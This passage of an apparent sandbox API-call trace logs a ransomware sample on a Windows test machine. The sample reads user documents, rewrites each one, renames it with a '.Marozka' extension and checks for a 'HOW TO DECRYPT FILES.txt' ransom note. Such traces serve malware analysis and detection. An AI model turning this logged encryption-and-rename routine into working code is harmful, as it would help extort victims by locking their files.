lpOldMode=0x5be9a0) returned 1 [0051.445] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0051.445] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf", lpFilePart=0x0) returned 0x54 [0051.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0051.445] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\bxlcd7fvcgqmnc.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.447] GetFileType (hFile=0x2e0) returned 0x1 [0051.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0051.447] GetFileType (hFile=0x2e0) returned 0x1 [0051.447] WriteFile (in: hFile=0x2e0, lpBuffer=0x2821b2c*, nNumberOfBytesToWrite=0xc660, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x2821b2c*, lpNumberOfBytesWritten=0x5be9c8*=0xc660, lpOverlapped=0x0) returned 1 [0051.449] CloseHandle (hObject=0x2e0) returned 1 [0051.452] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf", lpFilePart=0x0) returned 0x54 [0051.453] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf.Marozka", lpFilePart=0x0) returned 0x5c [0051.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0051.453] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\bxlcd7fvcgqmnc.pdf"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8250def0, ftCreationTime.dwHighDateTime=0x1d4d00c, ftLastAccessTime.dwLowDateTime=0xc8406580, ftLastAccessTime.dwHighDateTime=0x1d4d2a4, ftLastWriteTime.dwLowDateTime=0xe1670bff, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xc660)) returned 1 [0051.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0051.453] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\bxlcd7fvcgqmnc.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\bxlcd7fvcgqmnc.pdf.marozka")) returned 1 [0051.454] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx", lpFilePart=0x0) returned 0x5a [0051.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0051.454] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\iif-bjyqwte2z6xcu-b.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.454] GetFileType (hFile=0x2e0) returned 0x1 [0051.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0051.454] GetFileType (hFile=0x2e0) returned 0x1 [0051.454] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x1266d [0051.458] ReadFile (in: hFile=0x2e0, lpBuffer=0x262f038, nNumberOfBytesToRead=0x1266d, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x262f038*, lpNumberOfBytesRead=0x5be9d4*=0x1266d, lpOverlapped=0x0) returned 1 [0051.458] CloseHandle (hObject=0x2e0) returned 1 [0051.679] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0051.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0051.679] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0051.679] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx", lpFilePart=0x0) returned 0x5a [0051.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0051.679] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\iif-bjyqwte2z6xcu-b.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.681] GetFileType (hFile=0x2e0) returned 0x1 [0051.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0051.681] GetFileType (hFile=0x2e0) returned 0x1 [0051.681] WriteFile (in: hFile=0x2e0, lpBuffer=0x26b32e4*, nNumberOfBytesToWrite=0x12670, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x26b32e4*, lpNumberOfBytesWritten=0x5be9c8*=0x12670, lpOverlapped=0x0) returned 1 [0051.683] CloseHandle (hObject=0x2e0) returned 1 [0051.685] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx", lpFilePart=0x0) returned 0x5a [0051.685] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx.Marozka", lpFilePart=0x0) returned 0x62 [0051.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0051.685] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\iif-bjyqwte2z6xcu-b.docx"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38567cf0, ftCreationTime.dwHighDateTime=0x1d4cf81, ftLastAccessTime.dwLowDateTime=0x34c89600, ftLastAccessTime.dwHighDateTime=0x1d4cde6, ftLastWriteTime.dwLowDateTime=0xe1885111, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x12670)) returned 1 [0051.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0051.686] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\iif-bjyqwte2z6xcu-b.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\IIf-bjyqWTE2z6XCu-b.docx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\iif-bjyqwte2z6xcu-b.docx.marozka")) returned 1 [0051.687] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx", lpFilePart=0x0) returned 0x54 [0051.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0051.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\qy2o1bte eyk.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.687] GetFileType (hFile=0x2e0) returned 0x1 [0051.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0051.687] GetFileType (hFile=0x2e0) returned 0x1 [0051.687] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x9797 [0051.687] ReadFile (in: hFile=0x2e0, lpBuffer=0x26c601c, nNumberOfBytesToRead=0x9797, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x26c601c*, lpNumberOfBytesRead=0x5be9d4*=0x9797, lpOverlapped=0x0) returned 1 [0051.687] CloseHandle (hObject=0x2e0) returned 1 [0051.710] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0051.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0051.710] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0051.711] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx", lpFilePart=0x0) returned 0x54 [0051.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0051.711] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\qy2o1bte eyk.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.712] GetFileType (hFile=0x2e0) returned 0x1 [0051.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0051.712] GetFileType (hFile=0x2e0) returned 0x1 [0051.712] WriteFile (in: hFile=0x2e0, lpBuffer=0x2742428*, nNumberOfBytesToWrite=0x97a0, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x2742428*, lpNumberOfBytesWritten=0x5be9c8*=0x97a0, lpOverlapped=0x0) returned 1 [0051.714] CloseHandle (hObject=0x2e0) returned 1 [0051.797] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx", lpFilePart=0x0) returned 0x54 [0051.797] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx.Marozka", lpFilePart=0x0) returned 0x5c [0051.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0051.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\qy2o1bte eyk.pptx"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8169e240, ftCreationTime.dwHighDateTime=0x1d4d55a, ftLastAccessTime.dwLowDateTime=0x98028750, ftLastAccessTime.dwHighDateTime=0x1d4d3de, ftLastWriteTime.dwLowDateTime=0xe19b790d, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x97a0)) returned 1 [0051.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0051.798] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\qy2o1bte eyk.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\qy2O1BTE Eyk.pptx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\qy2o1bte eyk.pptx.marozka")) returned 1 [0051.798] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt", lpFilePart=0x0) returned 0x4f [0051.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0051.798] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\swpfkexhr.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.798] GetFileType (hFile=0x2e0) returned 0x1 [0051.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0051.799] GetFileType (hFile=0x2e0) returned 0x1 [0051.799] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x1434d [0051.799] ReadFile (in: hFile=0x2e0, lpBuffer=0x274c224, nNumberOfBytesToRead=0x1434d, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x274c224*, lpNumberOfBytesRead=0x5be9d4*=0x1434d, lpOverlapped=0x0) returned 1 [0051.800] CloseHandle (hObject=0x2e0) returned 1 [0051.823] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0051.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0051.824] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0051.824] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt", lpFilePart=0x0) returned 0x4f [0051.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0051.824] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\swpfkexhr.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.825] GetFileType (hFile=0x2e0) returned 0x1 [0051.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0051.826] GetFileType (hFile=0x2e0) returned 0x1 [0051.826] WriteFile (in: hFile=0x2e0, lpBuffer=0x27d5a14*, nNumberOfBytesToWrite=0x14350, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x27d5a14*, lpNumberOfBytesWritten=0x5be9c8*=0x14350, lpOverlapped=0x0) returned 1 [0051.828] CloseHandle (hObject=0x2e0) returned 1 [0051.831] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt", lpFilePart=0x0) returned 0x4f [0051.831] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt.Marozka", lpFilePart=0x0) returned 0x57 [0051.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0051.831] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\swpfkexhr.odt"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c05120, ftCreationTime.dwHighDateTime=0x1d4d5fc, ftLastAccessTime.dwLowDateTime=0x255fd0b0, ftLastAccessTime.dwHighDateTime=0x1d4ce32, ftLastWriteTime.dwLowDateTime=0xe1a027bd, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x14350)) returned 1 [0051.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0051.831] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\swpfkexhr.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\sWPfKeXhR.odt.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\swpfkexhr.odt.marozka")) returned 1 [0051.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0051.832] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD", lpFilePart=0x0) returned 0x51 [0051.832] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7d908 [0051.832] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0051.833] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0051.833] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0051.833] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0051.833] FindClose (in: hFindFile=0xa7d908 | out: hFindFile=0xa7d908) returned 1 [0051.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0051.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0051.833] SetThreadErrorMode 